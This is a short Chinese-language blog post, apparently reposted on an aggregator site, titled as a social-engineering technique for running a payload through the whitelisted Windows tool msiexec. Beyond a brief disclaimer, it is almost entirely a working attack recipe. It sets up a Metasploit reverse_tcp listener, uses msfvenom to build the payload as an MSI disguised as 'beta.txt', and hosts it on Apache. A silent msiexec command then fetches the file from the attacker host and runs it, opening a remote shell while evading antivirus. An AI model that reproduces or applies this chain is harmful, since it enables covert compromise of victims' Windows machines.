社会工程学 | 白名单Msiexec执行payload方式!
生活随笔
收集整理的這篇文章主要介紹了
社会工程学 | 白名单Msiexec执行payload方式!
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
聲明:本人堅決反對利用文章內容進行惡意攻擊行為,一切錯誤行為必將受到懲罰,綠色網絡需要靠我們共同維護,推薦大家在了解技術原理的前提下,更好的維護個人信息安全、企業安全、國家安全。
msiexec是非常重要的操作系統組件,通常用來安裝Windows Installer安裝包,而且msiexec支持遠程加載msi程序功能,因此可以通過msiexec加載遠程的惡意msi程序,實現免殺的效果。其它的白名單執行payload包括:Wmic、Mshta.exe、 Regsvr32、Regsvcs、Regasm、 Rundll32、PsExec、 Cmstp.exe等。
1
MSF監聽設置
>> use exploit/multi/handler >> set lhost 192.168.146.130 >> set lport 9998 >> set payload windows/x64/shell/reverse_tcp >> exploit -j? ? ? ? ?
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.146.130 LPORT=9998 -f msi > beta.txt開啟web服務,將beta.txt移動到web服務的根目錄
>> sudo service apache2 start >> sudo mv beta.txt /var/www/html/2
msiexecXEC執行Payload
C:\Windows\System32\msiexec.exe /q /i http://192.168.146.130/beta.txt-END-
▎經典文章精選
社會工程學 | cobalstrike批量發送釣魚郵件方法
社會工程學 | office宏分離免殺及應急處置
社會工程學 | Yandex mail捆綁域名方法
社會工程學 | gophish批量發送郵件配置
社會工程學?| shellcode動態注入!
掃描下方?二維碼?加入我們吧!
總結
以上是生活随笔為你收集整理的社会工程学 | 白名单Msiexec执行payload方式!的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 开机出现指令“Ox00000000”的内
- 下一篇: RouterOS